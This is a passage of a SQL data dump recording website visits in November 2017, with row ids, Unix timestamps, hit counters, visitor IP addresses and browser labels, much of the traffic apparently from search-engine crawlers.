ther'),(173188,1509600366,1,1,0,0,'40.77.167.66','other'),(173189,1509600469,1,1,0,0,'37.143.101.114','chrome'),(173190,1509600612,1,1,0,0,'51.255.65.17','other'),(173191,1509600638,1,1,0,0,'51.255.65.86','other'),(173192,1509600882,1,1,0,0,'178.154.171.56','other'),(173193,1509602524,1,1,0,0,'37.9.113.82','other'),(173194,1509602594,1,1,0,0,'40.77.167.56','other'),(173195,1509602666,1,1,0,0,'217.182.132.76','other'),(173196,1509602994,1,1,0,0,'51.255.65.79','other'),(173197,1509603073,1,1,0,0,'217.182.132.82','other'),(173198,1509603188,1,1,0,0,'157.55.39.206','other'),(173199,1509603197,1,1,0,0,'51.255.65.14','other'),(173200,1509603335,1,1,0,0,'94.156.144.191','firefox'),(173201,1509603348,1,0,1,0,'66.249.76.108',''),(173202,1509603480,1,1,0,0,'37.9.113.134','other'),(173203,1509604062,1,1,0,0,'51.255.65.70','other'),(173204,1509604144,1,0,1,0,'66.249.76.93',''),(173205,1509604541,1,1,0,0,'217.182.132.71','other'),(173206,1509604664,1,1,0,0,'137.74.207.114','other'),(173207,1509605047,1,1,0,0,'37.9.113.101','other'),(173208,1509605147,1,1,0,0,'217.182.132.60','other'),(173209,1509605179,1,1,0,0,'51.255.71.121','other'),(173210,1509605942,1,1,0,0,'46.211.96.127','chrome'),(173211,1509606024,1,1,0,0,'51.255.65.10','other'),(173212,1509606237,1,1,0,0,'207.154.209.63','other'),(173213,1509606355,1,1,0,0,'217.182.132.76','other'),(173214,1509606398,1,1,0,0,'37.9.113.56','other'),(173215,1509606518,1,1,0,0,'194.29.205.19','firefox'),(173216,1509606685,1,1,0,0,'217.182.132.15','other'),(173217,1509606761,1,1,0,0,'51.255.65.46','other'),(173218,1509606834,1,1,0,0,'91.196.178.168','chrome'),(173219,1509606888,1,1,0,0,'8.29.198.25','other'),(173220,1509607617,1,1,0,0,'92.112.227.25','firefox'),(173221,1509607635,1,1,0,0,'217.182.132.27','other'),(173222,1509607808,1,1,0,0,'213.180.203.7','other'),(173223,1509608050,1,1,0,0,'91.196.178.70','chrome'),(173224,1509608641,1,1,0,0,'51.255.71.123','other'),(173225,1509608719,1,1,0,0,'37.9.113.134','other'),(173226,1509608792,2,1,1,0,'66.249.70.25',''),(173227,1509608806,1,1,0,0,'66.249.64.28','chrome'),(173228,1509608880,1,1,0,0,'137.74.207.188','other'),(173229,1509609016,2,0,2,0,'66.249.76.89',''),(173230,1509609038,1,0,1,0,'66.249.76.91',''),(173231,1509609196,1,1,0,0,'164.132.164.180','other'),(173232,1509609295,1,1,0,0,'37.54.160.160','firefox'),(173233,1509609521,1,1,0,0,'178.154.200.7','other'),(173234,1509609931,1,1,0,0,'66.249.70.29','chrome'),(173235,1509610178,1,1,0,0,'66.249.76.89','chrome'),(173236,1509610260,1,1,0,0,'91.196.178.104','chrome'),(173237,1509610287,1,1,0,0,'217.182.132.56','other'),(173238,1509610932,2,2,0,0,'5.189.183.71','other'),(173239,1509610951,1,1,0,0,'217.182.132.187','other'),(173240,1509611066,1,1,0,0,'178.154.171.88','other'),(173241,1509611260,1,1,0,0,'217.182.132.146','other'),(173242,1509611506,1,1,0,0,'137.74.207.109','other'),(173243,1509611803,1,1,0,0,'217.182.132.72','other'),(173244,1509612047,1,1,0,0,'130.180.212.194','chrome'),(173245,1509612168,1,1,0,0,'5.164.97.254','msie'),(173246,1509612551,1,1,0,0,'51.255.65.68','other'),(173247,1509613223,1,1,0,0,'51.255.65.70','other'),(173248,1509613408,1,1,0,0,'217.182.132.68','other'),(173249,1509613496,1,1,0,0,'164.132.162.155','other'),(173250,1509613541,1,1,0,0,'194.29.205.19','firefox'),(173251,1509613746,1,1,0,0,'40.77.167.66','other'),(173252,1509614309,1,1,0,0,'164.132.162.158','other'),(173253,1509614315,1,1,0,0,'91.196.178.162','chrome'),(173254,1509614396,1,1,0,0,'217.182.132.24','other'),(173255,1509614431,1,1,0,0,'94.156.144.191','firefox'),(173256,1509614617,1,1,0,0,'37.52.18.104','firefox'),(173257,1509614717,2,2,0,0,'91.196.178.104','chrome'),(173258,1509615010,1,1,0,0,'178.154.171.10','other'),(173259,1509615150,1,1,0,0,'82.207.91.234','other'),(173260,1509615286,1,1,0,0,'164.132.162.158','other'),(173261,1509615602,1,1,0,0,'91.196.177.46','chrome'),(173262,1509616072,1,1,0,0,'195.91.224.113','chrome'),(173263,1509616102,1,1,0,0,'217.182.132.147','other'),(173264,1509616321,1,0,1,0,'66.249.64.28',''),(173265,1509616463,1,1,0,0,'51.255.65.81','other'),(173266,1509617009,1,1,0,0,'91.196.178.68','chrome'),(173267,1509617718,1,1,0,0,'8.29.198.27','other'),(173268,1509617912,1,1,0,0,'217.182.132.81','other'),(173269,1509617958,1,1,0,0,'198.211.121.79','chrome'),(173270,1509618297,1,1,0,0,'217.182.132.80','other'),(173271,1509618700,1,0,1,0,'66.249.76.108',''),(173272,1509618721,1,1,0,0,'79.164.156.105','msie'),(173273,1509618722,1,1,0,0,'37.110.99.96','msie'),(173274,1509618723,1,1,0,0,'128.72.40.13','msie'),(173275,1509618725,1,1,0,0,'5.164.104.19','msie'),(173276,1509618726,1,1,0,0,'109.173.36.142','msie'),(173277,1509618727,1,1,0,0,'128.68.134.100','msie'),(173278,1509619080,1,1,0,0,'91.201.55.91','chrome'),(173279,1509619083,1,1,0,0,'217.182.132.91','other'),(173280,1509619904,2,2,0,0,'31.43.35.105','chrome'),(173281,1509620035,1,1,0,0,'217.182.132.174','other'),(173282,1509620665,1,0,1,0,'66.249.76.93',''),(173283,1509620973,1,1,0,0,'51.255.65.2','other'),(173284,1509621059,1,1,0,0,'77.222.134.100','firefox'),(173285,1509621684,1,1,0,0,'51.255.71.114','other'),(173286,1509622147,1,1,0,0,'77.222.134.100','firefox'),(173287,1509622380,1,1,0,0,'51.255.71.112','other'),(173288,1509622707,1,1,0,0,'91.196.178.166','chrome'),(173289,1509622814,1,0,1,0,'66.249.64.29',''),(173290,1509622879,4,4,0,0,'141.8.142.74','other'),(173291,1509622980,1,1,0,0,'91.196.177.176','chrome'),(173292,1509623409,2,2,0,0,'87.250.224.46','other'),(173293,1509623607,10,10,0,0,'69.58.178.57','other'),(173294,1509623791,1,0,1,0,'66.249.76.108',''),(173295,1509624058,1,1,0,0,'91.196.178.168','chrome'),(173296,1509624218,1,1,0,0,'180.76.15.153','other'),(173297,1509624968,1,0,1,0,'66.249.64.30',''),(173298,1509625562,1,1,0,0,'164.132.162.155','other'),(173299,1509625604,1,0,1,0,'66.249.76.108',''),(173300,1509625646,2,2,0,0,'91.196.177.176','chrome'),(173301,1509626402,1,1,0,0,'137.74.203.194','other'),(173302,1509626884,1,1,0,0,'91.196.178.70','chrome'),(173303,1509627209,1,1,0,0,'217.182.132.17','other'),(173304,1509627294,1,1,0,0,'91.196.178.67','chrome'),(173305,1509627349,1,1,0,0,'91.196.178.67','firefox'),(173306,1509627356,1,1,0,0,'54.208.102.37','other'),(173307,1509627779,1,1,0,0,'82.145.221.128','chrome'),(173308,1509627869,1,1,0,0,'40.77.167.56','other'),(173309,1509627915,1,1,0,0,'31.13.113.66','other'),(173310,1509627922,1,1,0,0,'31.13.113.85','other'),(173311,1509627933,1,1,0,0,'31.13.114.150','other'),(173312,1509628297,1,1,0,0,'91.196.177.46','chrome'),(173313,1509628552,1,1,0,0,'8.29.198.27','other'),(173314,1509628688,1,1,0,0,'91.196.178.67','chrome'),(173315,1509628711,1,0,1,0,'66.249.76.107',''),(173316,1509628721,1,1,0,0,'91.196.178.168','chrome'),(173317,1509629015,1,1,0,0,'37.53.137.221','chrome'),(173318,1509629152,1,1,0,0,'91.196.178.71','chrome'),(173319,1509629596,1,1,0,0,'188.166.0.65','chrome'),(173320,1509629600,1,1,0,0,'195.10.210.70','chrome'),(173321,1509629958,1,1,0,0,'217.182.132.61','other'),(173322,1509630070,1,1,0,0,'95.135.254.250','chrome'),(173323,1509630154,1,1,0,0,'94.156.144.191','firefox'),(173324,1509630237,1,1,0,0,'46.133.252.197','chrome'),(173325,1509630741,1,1,0,0,'216.244.66.237','other'),(173326,1509630757,2,2,0,0,'91.196.178.70','chrome'),(173327,1509631097,1,1,0,0,'217.182.132.15','other'),(173328,1509631302,1,1,0,0,'217.182.132.35','other'),(173329,1509631393,1,1,0,0,'91.196.178.67','chrome'),(173330,1509631395,1,1,0,0,'95.132.38.183','firefox'),(173331,1509631438,1,1,0,0,'217.182.132.30','other'),(173332,1509631887,1,1,0,0,'178.92.85.231','chrome'),(173333,1509632209,1,1,0,0,'5.9.106.230','other'),(173334,1509632276,1,1,0,0,'164.132.162.156','other'),(173335,1509632597,1,1,0,0,'95.132.103.65','chrome'),(173336,1509632648,1,1,0,0,'176.36.19.54','chrome'),(173337,1509632781,1,1,0,0,'78.137.4.82','chrome'),(173338,1509633056,1,1,0,0,'217.69.133.229','other'),(173339,1509633087,22,22,0,0,'142.4.200.37','other'),(173340,1509633347,1,1,0,0,'92.52.154.59','chrome'),(173341,1509633353,1,1,0,0,'164.132.164.180','other'),(173342,1509633482,1,1,0,0,'51.255.65.38','other'),(173343,1509633497,1,1,0,0,'164.132.162.158','other'),(173344,1509633515,1,1,0,0,'91.196.178.40','chrome'),(173345,1509634402,1,1,0,0,'91.196.178.70','chrome'),(173346,1509634693,1,1,0,0,'137.74.207.161','other'),(173347,1509634892,1,1,0,0,'217.182.132.156','other'),(173348,1509634990,1,1,0,0,'37.9.113.110','other'),(173349,1509635080,1,1,0,0,'40.77.167.56','other'),(173350,1509635209,1,1,0,0,'217.182.132.21','other'),(173351,1509635356,1,1,0,0,'91.196.177.46','chrome'),(173352,1509635560,1,1,0,0,'91.196.178.67','chrome'),(173353,1509635807,1,1,0,0,'51.255.71.126','other'),(173354,1509636458,1,1,0,0,'180.76.15.139','other'),(173355,1509636515,1,1,0,0,'37.9.113.101','other'),(173356,1509636761,1,1,0,0,'137.74.207.114','other'),(173357,1509636849,1,1,0,0,'51.255.65.22','other'),(173358,1509637241,2,2,0,0,'178.95.227.162','other'),(173359,1509637365,1,1,0,0,'51.255.65.83','other'),(173360,1509637689,1,1,0,0,'87.250.224.46','other'),(173361,1509637773,1,1,0,0,'216.244.66.237','other'),(173362,1509638181,1,1,0,0,'51.255.65.37','other'),(173363,1509638280,1,1,0,0,'141.8.142.74','other'),(173364,1509638292,1,1,0,0,'217.182.132.188','other'),(173365,1509638530,1,1,0,0,'51.255.65.93','other'),(173366,1509638545,1,1,0,0,'164.132.162.187','other'),(173367,1509638812,1,1,0,0,'78.111.186.240','chrome'),(173368,1509639104,1,0,1,0,'66.249.64.28',''),(173369,1509639195,1,1,0,0,'157.55.39.206','other'),(173370,1509639225,1,1,0,0,'51.255.65.65','other'),(173371,1509639383,1,1,0,0,'8.29.198.27','other'),(173372,1509639647,1,1,0,0,'95.132.59.201','firefox'),(173373,1509639687,1,1,0,0,'67.189.205.188','other'),(173374,1509639827,1,1,0,0,'217.182.132.35','other'),(173375,1509640038,1,1,0,0,'51.255.65.43','other'),(173376,1509640294,1,1,0,0,'51.255.71.120','other'),(173377,1509640310,1,1,0,0,'164.132.162.155','other'),(173378,1509640568,1,1,0,0,'217.182.132.191','other'),(173379,1509640873,1,0,1,0,'66.249.66.74',''),(173380,1509641527,1,1,0,0,'137.74.207.119','other'),(173381,1509641759,1,1,0,0,'217.182.132.62','other'),(173382,1509641908,1,1,0,0,'217.182.132.149','other'),(173383,1509641920,1,1,0,0,'217.182.132.181','other'),(173384,1509641928,1,1,0,0,'46.211.97.9','chrome'),(173385,1509642698,1,1,0,0,'91.196.178.136','chrome'),(173386,1509642912,1,1,0,0,'51.255.65.84','other'),(173387,1509643974,1,1,0,0,'217.69.133.10','other'),(173388,1509644242,1,1,0,0,'217.182.132.64','other'),(173389,1509644310,1,1,0,0,'51.255.65.94','other'),(173390,1509644468,1,1,0,0,'40.77.167.56','other'),(173391,1509644474,1,1,0,0,'51.255.65.25','other'),(173392,1509644547,1,1,0,0,'216.244.66.237','other'),(173393,1509644781,1,1,0,0,'217.182.132.14','other'),(173394,1509644881,1,1,0,0,'51.255.65.29','other'),(173395,1509645156,1,1,0,0,'37.9.113.182','other'),(173396,1509645231,1,1,0,0,'199.58.86.209','other'),(173397,1509645316,1,0,1,0,'66.249.76.109',''),(173398,1509645479,1,1,0,0,'217.182.132.183','other'),(173399,1509645542,1,1,0,0,'40.77.167.56','other'),(173400,1509645607,1,1,0,0,'91.196.178.67','firefox'),(173401,1509646263,1,1,0,0,'51.255.65.66','other'),(173402,1509646803,1,1,0,0,'178.154.200.7','other'),(173403,1509647305,1,1,0,0,'217.182.132.69','other'),(173404,1509647349,1,1,0,0,'78.111.186.240','chrome'),(173405,1509647627,1,1,0,0,'217.182.132.17','other'),(173406,1509647816,2,2,0,0,'142.4.200.37','other'),(173407,1509647987,1,1,0,0,'217.182.132.187','other'),(173408,1509648068,1,1,0,0,'51.255.65.29','other'),(173409,1509648203,1,0,1,0,'66.249.76.89',''),(173410,1509648278,1,1,0,0,'46.133.82.253','chrome'),(173411,1509648307,1,1,0,0,'141.8.142.74','other'),(173412,1509648770,1,0,1,0,'66.249.66.73',''),(173413,1509649017,1,1,0,0,'37.9.113.157','other'),(173414,1509649069,1,1,0,0,'91.196.178.40','chrome'),(173415,1509649473,1,1,0,0,'217.182.132.58','other'),(173416,1509649693,1,1,0,0,'66.249.66.157','chrome'),(173417,1509649698,1,0,1,0,'66.249.66.156',''),(173418,1509649704,1,1,0,0,'66.249.76.108','chrome'),(173419,1509649932,1,1,0,0,'178.154.171.55','other'),(173420,1509650075,1,1,0,0,'217.182.132.176','other'),(173421,1509650175,1,1,0,0,'37.55.56.137','chrome'),(173422,1509650186,1,0,1,0,'66.249.66.74',''),(173423,1509650216,1,1,0,0,'8.29.198.25','other'),(173424,1509650442,1,0,1,0,'66.249.76.109',''),(173425,1509650742,1,1,0,0,'54.165.59.7','other'),(173426,1509650774,1,1,0,0,'51.255.65.81','other'),(173427,1509650966,1,1,0,0,'51.255.65.21','other'),(173428,1509651041,1,0,1,0,'66.249.66.73',''),(173429,1509651418,1,0,1,0,'66.249.76.108',''),(173430,1509651597,1,1,0,0,'217.182.132.68','other'),(173431,1509651599,1,1,0,0,'51.255.71.130','other'),(173432,1509652115,1,1,0,0,'51.255.65.96','other'),(173433,1509652121,1,1,0,0,'217.182.132.82','other'),(173434,1509652338,1,1,0,0,'217.182.132.97','other'),(173435,1509652367,1,1,0,0,'164.132.162.154','other'),(173436,1509652665,1,1,0,0,'94.156.144.191','firefox'),(173437,1509652883,1,1,0,0,'217.182.132.85','other'),(173438,1509653036,1,1,0,0,'217.182.132.175','other'),(173439,1509653050,1,1,0,0,'217.182.132.90','other'),(173440,1509653372,1,1,0,0,'51.255.65.58','other'),(173441,1509653957,1,0,1,0,'66.249.76.107',''),(173442,1509654477,1,1,0,0,'51.255.65.93','other'),(173443,1509654742,1,1,0,0,'51.255.65.55','other'),(173444,1509654822,1,1,0,0,'51.255.65.82','other'),(173445,1509654960,1,1,0,0,'178.92.8.0','firefox'),(173446,1509655144,1,1,0,0,'217.182.132.64','other'),(173447,1509655265,1,1,0,0,'51.255.71.126','other'),(173448,1509655485,1,1,0,0,'37.9.113.132','other'),(173449,1509655769,1,1,0,0,'164.132.162.154','other'),(173450,1509655832,1,1,0,0,'51.255.71.98','other'),(173451,1509656141,1,1,0,0,'178.154.171.81','other'),(173452,1509656249,1,0,1,0,'66.249.76.107',''),(173453,1509656718,1,1,0,0,'51.255.65.38','other'),(173454,1509656900,1,1,0,0,'51.255.65.62','other'),(173455,1509657134,1,1,0,0,'164.132.162.187','other'),(173456,1509657534,1,1,0,0,'217.182.132.94','other'),(173457,1509657757,1,1,0,0,'217.182.132.86','other'),(173458,1509658278,1,0,1,0,'66.249.66.158',''),(173459,1509658374,1,1,0,0,'178.154.171.88','other'),(173460,1509658748,1,1,0,0,'51.255.65.67','other'),(173461,1509658976,1,1,0,0,'216.244.66.237','other'),(173462,1509659360,1,1,0,0,'137.74.207.101','other'),(173463,1509659393,1,0,1,0,'66.249.76.108',''),(173464,1509660009,1,1,0,0,'164.132.162.153','other'),(173465,1509660035,1,1,0,0,'51.255.65.86','other'),(173466,1509660742,1,1,0,0,'66.249.66.73','chrome'),(173467,1509660809,1,1,0,0,'217.182.132.74','other'),(173468,1509660959,1,1,0,0,'157.55.39.206','other'),(173469,1509661046,1,1,0,0,'8.29.198.26','other'),(173470,1509661239,1,1,0,0,'91.196.178.132','chrome'),(173471,1509661418,1,1,0,0,'178.251.109.241','other'),(173472,1509661557,1,1,0,0,'51.255.65.3','other'),(173473,1509663334,1,1,0,0,'51.255.71.110','other'),(173474,1509663454,1,1,0,0,'51.255.64.106','other'),(173475,1509663610,1,1,0,0,'217.182.132.155','other'),(173476,1509664333,1,1,0,0,'51.255.65.92','other'),(173477,1509664760,1,0,1,0,'66.249.76.109',''),(173478,1509665021,1,1,0,0,'217.182.132.173','other'),(173479,1509665434,1,1,0,0,'137.74.207.110','other'),(173480,1509665955,1,1,0,0,'51.255.65.94','other'),(173481,1509666202,1,1,0,0,'217.182.132.81','other'),(173482,1509666226,1,1,0,0,'217.182.132.187','other'),(173483,1509666550,1,0,1,0,'66.249.66.158',''),(173484,1509667187,1,1,0,0,'217.182.132.61','other'),(173485,1509667255,1,1,0,0,'217.182.132.20','other'),(173486,1509667419,1,1,0,0,'94.158.70.65','firefox'),(173487,1509667728,1,1,0,0,'217.182.132.70','other'),(173488,1509667881,1,1,0,0,'37.9.113.110','other'),(173489,1509668330,1,1,0,0,'74.115.214.154','other'),(173490,1509668691,1,1,0,0,'80.241.214.124','other'),(173491,1509668746,1,1,0,0,'51.255.65.58','other'),(173492,1509668955,1,0,1,0,'66.249.76.107',''),(173493,1509668979,1,1,0,0,'217.182.132.79','other'),(173494,1509669438,1,1,0,0,'217.182.132.27','other'),(173495,1509669548,1,1,0,0,'137.74.207.164','other'),(173496,1509669623,1,1,0,0,'51.255.65.48','other'),(173497,1509669870,1,1,0,0,'51.255.65.80','other'),(173498,1509670082,1,1,0,0,'62.210.251.247','other'),(173499,1509670328,1,1,0,0,'51.255.65.25','other'),(173500,1509670487,1,1,0,0,'217.182.132.25','other'),(173501,1509670744,1,1,0,0,'217.182.132.54','other'),(173502,1509670790,1,1,0,0,'164.132.162.188','other'),(173503,1509671395,1,1,0,0,'164.132.162.160','other'),(173504,1509671689,1,1,0,0,'51.255.65.93','other'),(173505,1509671712,1,1,0,0,'216.244.66.237','other'),(173506,1509671876,1,1,0,0,'8.29.198.27','other'),(173507,1509673695,1,1,0,0,'217.182.132.84','other'),(173508,1509674124,1,1,0,0,'157.55.39.206','other'),(173509,1509674195,1,1,0,0,'51.255.65.96','other'),(173510,1509674286,1,1,0,0,'37.9.113.157','other'),(173511,1509674328,1,1,0,0,'66.249.76.108','chrome'),(173512,1509674525,1,1,0,0,'51.255.65.91','other'),(173513,1509674552,1,1,0,0,'5.45.207.82','other'),(173514,1509674882,1,1,0,0,'217.182.132.156','other'),(173515,1509674914,1,1,0,0,'217.182.132.86','other'),(173516,1509675233,1,1,0,0,'51.255.65.69','other'),(173517,1509675390,1,1,0,0,'51.255.65.37','other'),(173518,1509675644,1,1,0,0,'217.182.132.94','other'),(173519,1509675688,1,1,0,0,'216.244.66.237','other'),(173520,1509676440,1,1,0,0,'164.132.162.160','other'),(173521,1509676609,1,1,0,0,'51.255.71.129','other'),(173522,1509676672,1,1,0,0,'164.132.164.180','other'),(173523,1509676881,1,0,1,0,'66.249.76.107',''),(173524,1509677018,1,0,1,0,'66.249.76.91',''),(173525,1509677024,1,1,0,0,'66.249.66.155','chrome'),(173526,1509677030,1,1,0,0,'66.249.76.89','chrome'),(173527,1509677077,1,1,0,0,'217.182.132.180','other'),(173528,1509677082,8,8,0,0,'46.229.168.65','other'),(173529,1509677097,6,6,0,0,'46.229.168.80','other'),(173530,1509677120,3,3,0,0,'46.229.168.67','other'),(173531,1509677134,2,2,0,0,'46.229.168.79','other'),(173532,1509677174,4,4,0,0,'46.229.168.77','other'),(173533,1509677208,5,5,0,0,'46.229.168.72','other'),(173534,1509677266,4,4,0,0,'46.229.168.74','other'),(173535,1509677300,5,5,0,0,'46.229.168.70','other'),(173536,1509677357,6,6,0,0,'46.229.168.68','other'),(173537,1509677422,6,6,0,0,'46.229.168.76','other'),(173538,1509677444,3,3,0,0,'46.229.168.71','other'),(173539,1509677609,4,4,0,0,'46.229.168.73','other'),(173540,1509677674,3,3,0,0,'46.229.168.69','other'),(173541,1509677808,5,5,0,0,'46.229.168.66','other'),(173542,1509677809,1,1,0,0,'51.255.65.57','other'),(173543,1509677830,5,5,0,0,'46.229.168.78','other'),(173544,1509677874,7,7,0,0,'46.229.168.75','other'),(173545,1509678074,3,3,0,0,'46.229.168.80','other'),(173546,1509678113,2,2,0,0,'46.229.168.77','other'),(173547,1509678124,3,3,0,0,'46.229.168.79','other'),(173548,1509678257,9,9,0,0,'46.229.168.72','other'),(173549,1509678287,5,5,0,0,'46.229.168.67','other'),(173550,1509678298,4,4,0,0,'46.229.168.68','other'),(173551,1509678334,2,2,0,0,'46.229.168.76','other'),(173552,1509678385,8,8,0,0,'46.229.168.74','other'),(173553,1509678402,3,3,0,0,'46.229.168.71','other'),(173554,1509678678,6,6,0,0,'46.229.168.69','other'),(173555,1509678709,10,10,0,0,'46.229.168.66','other'),(173556,1509678809,9,9,0,0,'46.229.168.75','other'),(173557,1509678899,1,1,0,0,'217.182.132.68','other'),(173558,1509679030,5,5,0,0,'46.229.168.79','other'),(173559,1509679172,5,5,0,0,'46.229.168.72','other'),(173560,1509679202,3,3,0,0,'46.229.168.70','other'),(173561,1509679224,1,0,1,0,'66.249.66.155',''),(173562,1509679242,4,4,0,0,'46.229.168.67','other'),(173563,1509679294,3,3,0,0,'46.229.168.73','other'),(173564,1509679306,5,5,0,0,'46.229.168.71','other'),(173565,1509679411,5,5,0,0,'46.229.168.65','other'),(173566,1509679500,6,6,0,0,'46.229.168.80','other'),(173567,1509679536,5,5,0,0,'46.229.168.77','other'),(173568,1509679593,3,3,0,0,'46.229.168.69','other'),(173569,1509679617,3,3,0,0,'46.229.168.74','other'),(173570,1509679705,3,3,0,0,'46.229.168.66','other'),(173571,1509679809,10,10,0,0,'46.229.168.76','other'),(173572,1509679838,1,1,0,0,'51.255.65.54','other'),(173573,1509679898,6,6,0,0,'46.229.168.75','other'),(173574,1509679933,3,3,0,0,'46.229.168.79','other'),(173575,1509679969,7,7,0,0,'46.229.168.68','other'),(173576,1509680027,5,5,0,0,'46.229.168.78','other'),(173577,1509680318,1,1,0,0,'51.255.65.77','other'),(173578,1509680353,3,3,0,0,'46.229.168.71','other'),(173579,1509680435,3,3,0,0,'46.229.168.65','other'),(173580,1509680472,4,4,0,0,'46.229.168.67','other'),(173581,1509680604,4,4,0,0,'46.229.168.74','other'),(173582,1509680640,6,6,0,0,'46.229.168.72','other'),(173583,1509680685,1,1,0,0,'37.9.113.132','other'),(173584,1509680693,5,5,0,0,'46.229.168.69','other'),(173585,1509680728,5,5,0,0,'46.229.168.76','other'),(173586,1509680839,6,6,0,0,'46.229.168.70','other'),(173587,1509680871,2,2,0,0,'46.229.168.75','other'),(173588,1509680947,4,4,0,0,'46.229.168.79','other'),(173589,1509680995,1,1,0,0,'217.182.132.91','other'),(173590,1509681161,1,1,0,0,'46.229.168.80','other'),(173591,1509681175,4,4,0,0,'46.229.168.68','other'),(173592,1509681224,6,6,0,0,'46.229.168.73','other'),(173593,1509681291,7,7,0,0,'46.229.168.78','other'),(173594,1509681376,3,3,0,0,'46.229.168.77','other'),(173595,1509681470,7,7,0,0,'46.229.168.65','other'),(173596,1509681499,3,3,0,0,'46.229.168.67','other'),(173597,1509681513,6,6,0,0,'46.229.168.71','other'),(173598,1509681614,1,1,0,0,'51.15.82.2','opera'),(173599,1509681734,2,2,0,0,'46.229.168.72','other'),(173600,1509681798,3,3,0,0,'46.229.168.75','other'),(173601,1509681903,4,4,0,0,'46.229.168.70','other'),(173602,1509681939,5,5,0,0,'46.229.168.79','other'),(173603,1509682099,5,5,0,0,'46.229.168.68','other'),(173604,1509682136,6,6,0,0,'46.229.168.69','other'),(173605,1509682138,4,4,0,0,'46.229.168.73','other'),(173606,1509682150,7,7,0,0,'46.229.168.80','other'),(173607,1509682360,2,2,0,0,'46.229.168.77','other'),(173608,1509682380,7,7,0,0,'46.229.168.66','other'),(173609,1509682489,1,1,0,0,'141.8.142.74','other'),(173610,1509682494,4,4,0,0,'46.229.168.74','other'),(173611,1509682527,3,3,0,0,'46.229.168.65','other'),(173612,1509682547,4,4,0,0,'46.229.168.76','other'),(173613,1509682630,3,3,0,0,'46.229.168.78','other'),(173614,1509682708,6,6,0,0,'46.229.168.67','other'),(173615,1509682716,1,1,0,0,'8.29.198.27','other'),(173616,1509682838,3,3,0,0,'46.229.168.71','other'),(173617,1509682873,3,3,0,0,'46.229.168.70','other'),(173618,1509683053,2,2,0,0,'46.229.168.68','other'),(173619,1509683141,1,1,0,0,'46.229.168.80','other'),(173620,1509683218,1,1,0,0,'46.229.168.79','other'),(173621,1509683368,1,1,0,0,'46.229.168.75','other'),(173622,1509684092,1,1,0,0,'37.9.113.110','other'),(173623,1509684648,1,0,1,0,'66.249.66.156',''),(173624,1509684852,1,1,0,0,'91.196.178.99','chrome'),(173625,1509685365,1,0,1,0,'66.249.76.89',''),(173626,1509685996,1,1,0,0,'95.24.202.205','msie'),(173627,1509686899,1,1,0,0,'178.154.171.88','other'),(173628,1509687455,1,1,0,0,'95.220.204.24','chrome'),(173629,1509688515,1,0,1,0,'66.249.76.91',''),(173630,1509688560,1,1,0,0,'180.76.15.138','other'),(173631,1509688613,1,1,0,0,'130.180.210.142','chrome'),(173632,1509688772,1,0,1,0,'66.249.66.74',''),(173633,1509689559,1,1,0,0,'157.55.39.206','other'),(173634,1509689743,1,0,1,0,'66.249.79.157',''),(173635,1509690281,10,10,0,0,'144.76.115.190','other'),(173636,1509690956,1,1,0,0,'157.55.39.225','other'),(173637,1509691652,1,1,0,0,'46.211.117.212','chrome'),(173638,1509693446,1,1,0,0,'91.196.179.138','chrome'),(173639,1509693556,1,1,0,0,'8.29.198.26','other'),(173640,1509694026,1,1,0,0,'91.196.178.68','chrome'),(173641,1509694066,1,1,0,0,'180.76.15.151','other'),(173642,1509694300,1,0,1,0,'66.249.76.107',''),(173643,1509694521,1,1,0,0,'95.132.38.183','firefox'),(173644,1509694841,1,1,0,0,'91.196.178.163','chrome'),(173645,1509695072,1,1,0,0,'91.196.178.162','chrome'),(173646,1509695425,1,1,0,0,'91.196.178.70','chrome'),(173647,1509695656,1,1,0,0,'91.196.178.166','chrome'),(173648,1509695888,1,1,0,0,'128.72.212.252','msie'),(173649,1509696124,1,1,0,0,'51.255.65.5','other'),(173650,1509696382,1,1,0,0,'188.166.72.41','chrome'),(173651,1509696417,1,1,0,0,'217.182.132.66','other'),(173652,1509696630,1,1,0,0,'91.196.178.130','firefox'),(173653,1509697774,1,1,0,0,'217.182.132.90','other'),(173654,1509697777,1,1,0,0,'51.255.65.93','other'),(173655,1509698016,1,1,0,0,'91.196.178.70','chrome'),(173656,1509698039,1,1,0,0,'83.239.95.106','chrome'),(173657,1509698139,2,2,0,0,'91.196.178.66','firefox'),(173658,1509698261,1,1,0,0,'217.182.132.146','other'),(173659,1509698294,1,1,0,0,'51.255.71.126','other'),(173660,1509698417,1,1,0,0,'51.255.65.22','other'),(173661,1509698593,1,0,1,0,'66.249.76.89',''),(173662,1509698765,1,1,0,0,'40.77.167.56','other'),(173663,1509699009,1,1,0,0,'217.182.132.157','other'),(173664,1509699143,1,1,0,0,'180.76.15.153','other'),(173665,1509699164,1,0,1,0,'66.249.76.93',''),(173666,1509699595,1,1,0,0,'5.45.207.12','other'),(173667,1509700107,1,1,0,0,'217.182.132.240','other'),(173668,1509700283,1,1,0,0,'62.122.182.106','chrome'),(173669,1509700798,1,1,0,0,'217.182.132.19','other'),(173670,1509700809,1,1,0,0,'217.182.132.72','other'),(173671,1509700837,1,1,0,0,'217.182.132.78','other'),(173672,1509701556,1,1,0,0,'92.112.0.163','chrome'),(173673,1509702001,1,1,0,0,'66.249.76.91','chrome'),(173674,1509702182,1,1,0,0,'66.249.76.89','chrome'),(173675,1509702773,1,1,0,0,'91.196.178.166','chrome'),(173676,1509703840,1,1,0,0,'151.80.27.118','other'),(173677,1509703966,1,1,0,0,'164.132.162.160','other'),(173678,1509704195,1,1,0,0,'137.74.207.120','other'),(173679,1509704297,1,0,1,0,'66.249.76.108',''),(173680,1509704391,1,1,0,0,'8.29.198.26','other'),(173681,1509704568,1,1,0,0,'37.9.113.100','other'),(173682,1509704606,1,1,0,0,'157.55.39.206','other'),(173683,1509704618,1,1,0,0,'213.180.203.7','other'),(173684,1509704622,1,1,0,0,'213.180.203.8','other'),(173685,1509705383,2,2,0,0,'91.196.178.67','chrome'),(173686,1509706125,1,1,0,0,'51.255.65.97','other'),(173687,1509706130,1,1,0,0,'51.255.65.72','other'),(173688,1509706143,1,1,0,0,'217.182.132.82','other'),(173689,1509706150,1,1,0,0,'217.182.132.32','other'),(173690,1509706298,1,0,1,0,'66.249.79.155',''),(173691,1509706900,1,1,0,0,'217.182.132.6','other'),(173692,1509707003,1,0,1,0,'66.249.79.157',''),(173693,1509707105,1,1,0,0,'46.133.123.229','other'),(173694,1509707125,1,1,0,0,'164.132.162.153','other'),(173695,1509707639,1,1,0,0,'46.201.25.98','chrome'),(173696,1509707726,1,1,0,0,'188.191.103.32','chrome'),(173697,1509707730,1,1,0,0,'217.182.132.85','other'),(173698,1509707941,1,1,0,0,'91.196.178.104','chrome'),(173699,1509708683,1,